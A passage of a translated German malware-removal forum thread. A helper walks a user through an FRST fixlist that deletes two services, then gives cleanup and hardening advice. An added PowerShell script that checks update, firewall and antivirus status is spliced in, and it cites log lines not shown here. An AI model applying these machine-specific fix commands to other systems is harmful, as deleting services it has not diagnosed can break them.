14:26:57.0938 0x1a70 ============================================================
14:26:57.0938 0x1a70 Scan finished
14:26:57.0938 0x1a70 ============================================================
14:26:57.0948 0x1f18 Detected object count: 0
14:26:57.0948 0x1f18 Actual detected object count: 0
27.03.2015, 20:48 | #6 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP Dateien Manipuliert Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document Code:
AppInit_DLLs: PGPmapih.dll => PGPmapih.dll File Not Found
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
Emptytemp:
Please save this as Fixlist.txt on your Desktop (or in the directory where FRST is located).
28.03.2015, 18:21 | #7 |
| FTPs Flash FXP Dateien Manipuliert Hello, sorry for asking back, but I have encrypted my computer with PGP. How sure are you that this won't kill PGP and with it my access to the computer? Regards, Stefan |
29.03.2015, 08:50 | #8 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP Dateien Manipuliert The file supposedly isn't present, but to be safe you can leave out the top line.
__________________ regards, schrauber Proud Member of UNITE and ASAP since 2009 Donations Guides and help Trojaner-Board Facebook page No help via PM! |
29.03.2015, 20:27 | #9 |
| FTPs Flash FXP Dateien Manipuliert Done :-) Do you think I'm pest-free now? What should I install so I don't catch something again? I already had Trend Micro PC-cillin. Do I need an additional firewall besides the Windows one? Regards, Stefan Code:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 11-03-2015
Ran by k at 2015-03-29 18:03:28 Run:1
Running from C:\Users\k\Downloads\trojaner anleitung
Loaded Profiles: k (Available profiles: k)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
Emptytemp:
*****************

rpcapd => Service deleted successfully.
WinHttpAutoProxySvc => Service deleted successfully.
EmptyTemp: => Removed 854.2 MB temporary data.

The system needed a reboot.

==== End of Fixlog 18:04:49 ====
30.03.2015, 05:33 | #10 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP Dateien Manipuliert That is covered in the cleanup and hardening text that follows.

Cleanup: (the order matters here)
If Defogger was used: run it again and click Re-enable.
If Combofix was used: uninstall Combofix.
All logs posted? Then please download DelFix.
Note: DelFix removes, among other things, all the programs that were used, our scanners' quarantine and the Java cache, and finally deletes itself.
Finally, restart your computer. If any programs from our cleanup are still left over, you can safely delete them.
If you like, you can say here whether you were satisfied with me and my help... and/or support the forum with a small donation.

Hardening:
Enable automatic updates for the Windows operating system.
Security-relevant software should also always be kept at its latest version:
Browser
Java
Flash Player
PDF reader
Security holes in old versions of these are exploited to install malware "drive-by" simply by visiting a manipulated website.
I recommend, for example, using Mozilla Firefox instead of Internet Explorer. Firefox can also open PDF documents.
Enable a firewall. The one built into Windows is normally entirely sufficient.
Use an antivirus program with a real-time scanner and an always up-to-date signature database. My recommendation: Emsisoft
In addition, you can scan your PC regularly with Malwarebytes Anti-Malware and ESET.
Optional:
NoScript blocks the execution of active content (Java, JavaScript, Flash, ...) for all websites. Using a whitelist, you can specify on which sites scripts are to be allowed.
Malwarebytes Anti Exploit: protects the computer's applications against the exploitation of known vulnerabilities.
Download software from a clean portal such as .
When installing software, always choose the custom option and untick every optionally offered toolbar or other add-on that is irrelevant to the program.
To get rid of adware again, uninstalling it first and then removing the leftovers with AdwCleaner is recommended.

Finally, a few general remarks:
Change your important online passwords regularly and make regular backups of your important files or of the system.
The benefit of registry cleaners, optimizers etc. for boosting performance is disputed. I therefore recommend keeping your hands off the registry and using the Windows built-in Disk Cleanup instead.
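As an added example (not part of schrauber's post and not a Trojaner-Board tool), the following PowerShell script checks the baseline items from the hardening list on the local machine: whether automatic updates are set to install automatically, whether the Windows firewall is on for each network profile, and whether an antivirus with real-time protection and current signatures is registered with Security Center. It reads the same Security Center data the TDSSKiller log above reports as "AV detected via SS2", so the productState value it prints can be compared with the 0x41000 in that log. It assumes Windows 7 or newer with Windows PowerShell 2.0 or later, run from an elevated prompt; the productState bit decoding is the commonly documented interpretation, not an official API.

```powershell
# Added example, not code from the Trojaner-Board post. Checks the baseline
# hardening items (automatic updates, Windows firewall, antivirus with
# real-time protection) on the local machine.
# Assumes Windows 7 or newer with Windows PowerShell 2.0+; run elevated.

function Get-AutoUpdateStatus {
    # Windows Update Agent COM API. NotificationLevel: 1 = disabled,
    # 2 = notify before download, 3 = notify before install,
    # 4 = download and install automatically (the recommended setting).
    $settings = (New-Object -ComObject Microsoft.Update.AutoUpdate).Settings
    $names = @{ 0 = 'not configured'; 1 = 'disabled'; 2 = 'notify before download';
                3 = 'notify before install'; 4 = 'install automatically' }
    $level = [int]$settings.NotificationLevel
    New-Object PSObject -Property @{
        Level = $level
        Text  = $names[$level]
        Ok    = ($level -eq 4)
    }
}

function Get-FirewallStatus {
    # HNetCfg.FwPolicy2 (INetFwPolicy2) is locale independent, unlike parsing
    # the output of "netsh advfirewall", which is translated on German Windows.
    # Profile types: 1 = domain, 2 = private, 4 = public.
    $fw = New-Object -ComObject HNetCfg.FwPolicy2
    $profiles = @{ 'Domain' = 1; 'Private' = 2; 'Public' = 4 }
    foreach ($name in @('Domain', 'Private', 'Public')) {
        New-Object PSObject -Property @{
            Profile = $name
            Enabled = [bool]$fw.FirewallEnabled($profiles[$name])
        }
    }
}

function Get-AntivirusStatus {
    # root\SecurityCenter2 is the Security Center WMI namespace ("SS2" in the
    # TDSSKiller log). productState is a bit field; by the commonly documented
    # reading, the middle byte 0x10 or 0x11 means real-time protection is on
    # and the low byte 0x00 means signatures are current (0x10 = out of date).
    # Example: 0x41000 decodes to enabled + up to date, as the log prints it.
    $products = Get-WmiObject -Namespace 'root\SecurityCenter2' `
        -Class AntiVirusProduct -ErrorAction SilentlyContinue
    foreach ($av in @($products)) {
        if ($av -eq $null) { continue }
        $hex = '{0:x6}' -f [int]$av.productState
        New-Object PSObject -Property @{
            Name     = $av.displayName
            State    = '0x' + $hex.TrimStart('0')
            Enabled  = (@('10', '11') -contains $hex.Substring(2, 2))
            UpToDate = ($hex.Substring(4, 2) -eq '00')
        }
    }
}

# Print a short report. Every line that says OFF, disabled or "none registered"
# is an item from the hardening list that still needs attention.
$au = Get-AutoUpdateStatus
"Automatic updates : $($au.Text) (NotificationLevel $($au.Level))"
foreach ($p in Get-FirewallStatus) {
    $state = if ($p.Enabled) { 'ON' } else { 'OFF' }
    "Firewall $($p.Profile.PadRight(7)) : $state"
}
$avs = @(Get-AntivirusStatus)
if ($avs.Count -eq 0) {
    "Antivirus         : none registered with Security Center"
}
foreach ($a in $avs) {
    "Antivirus         : $($a.Name) $($a.State) real-time=$($a.Enabled) up-to-date=$($a.UpToDate)"
}
```

Two antivirus products registered at once (as in the log above, Avira and Trend Micro) will both be listed; running two real-time scanners side by side is a common source of conflicts, so the report is also a quick way to notice that situation.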
05.04.2015, 02:45 | #11 |
| FTPs Flash FXP Dateien Manipuliert Thanks for your help, I've made a donation :-) How sure can I be that I am currently *free* of vermin? |
05.04.2015, 13:16 | #12 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP Dateien Manipuliert 99%